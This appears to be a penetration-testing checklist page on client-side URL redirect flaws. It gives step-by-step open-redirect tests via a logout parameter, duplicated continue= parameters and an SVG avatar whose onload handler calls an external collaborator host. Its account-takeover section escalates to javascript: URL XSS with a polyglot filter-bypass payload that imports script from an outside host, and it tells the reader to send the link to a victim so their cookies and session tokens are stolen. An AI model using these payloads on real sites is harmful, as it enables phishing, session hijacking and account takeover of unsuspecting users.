Client Side URL Redirect

Check List

Methodology

Black Box

Redirection via /logout

1

Open the target application

2

Login using your email and password

3

Verify your mobile OTP

4

You will be redirected to https://example.com/?landing_uri=example.com

5

Now modify the URL https://example.com/logout?redirect_uri=https://evil.com

6

Upon visiting this URL, you will be redirected to without any validation or warning

Open Redirect via Duplicate parameter

1

Log in to the target site and complete the registration process

2

Then use the Burp suite tool to trace the requests and check if you see a parameter called مcontinue= or next= that has a url value Like the request below

https://myaccount.example.com/security-checkup/1?continue=https://accounts.examplew.com/...
3

Copy the full original URL and append your payload as a second continue= parameter

https://myaccount.example.com/security-checkup/1?continue=https://myaccount.example.com/security-checkup/1?continue=https://evil.com
4

Open the crafted URL while logged in

5

Click the "Continue" button (or any button that triggers the redirect)

6

If you land on https://evil.com, Open Redirect via parameter chaining confirmed

Open Redirect Via Image Upload

1

Go to any profile picture, avatar, logo, or image upload feature on the target

2

Create this exact SVG file locally (save as redirect.svg)

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg onload="window.location='http://0vwsb0oeappr3l1za7as1agllcr3fy3n.oastify.com'" xmlns="http://www.w3.org/2000/svg">
  <rect width="100" height="100" fill="red"/>
</svg>
3

Go back to the upload feature and upload redirect.svg as your new profile picture/avatar

4

Intercept the upload POST request with Burp Suite

5

If needed, change Content-Type to image/svg+xml or remove it entirely

6

Complete the upload

7

So now go to Collaborator in burp suite and check if a request has been sent or open your profile page or anyone else’s profile who can view your avatar, If you are instantly redirected to https://evil.com, Open Redirect via SVG Avatar confirmed

Account Takeover

1

Go to the login page or any sign-in/auth page and look for redirect parameters

2

Test basic open redirect first

https://target.com/auth/signin?redirect=https://evil.com
3

If you land on evil.com after login, Open Redirect confirmed and Now escalate to XSS

https://target.com/auth/signin?redirect=javascript:alert(1)
4

If alert pops after clicking “Sign in”, Direct JavaScript execution confirmed

5

If it’s filtered, use this universal bypass payload

https://target.com/auth/signin?redirect=javascript://%250Aalert(1)

or

https://target.com/auth/signin?redirect=JavaScript://%250A/*?%27/*\%27/*%22/*\%22/*`/*\`/*%26apos;)/*%3C!--%3E%3C/Title/%3C/Style/%3C/Script/%3C/textArea/%3C/iFrame/%3C/noScript%3E\74k%3CK/contentEditable/autoFocus/OnFocus=/${/*/;{/**/(import(/https:\\burpcollab.net/.source))}}//\76--%3E
6

Send this exact link to the victim like

https://target.com/auth/signin?redirect=JavaScript://%250A/*?%27/*\%27/*%22/*\%22/*`/*\`/*%26apos;)/*%3C!--%3E%3C/Title/%3C/Style/%3C/Script/%3C/textArea/%3C/iFrame/%3C/noScript%3E\74k%3CK/contentEditable/autoFocus/OnFocus=/${/*/;{/**/(import(/https:\\burpcollab.net/.source))}}//\76--%3E
7

Victim clicks logs in gets silently redirected your server receives full cookies localStorage session tokens, Account Takeover achieved

White Box

Cheat Sheet

PreviousHTML InjectionNextCSS Injection

Last updated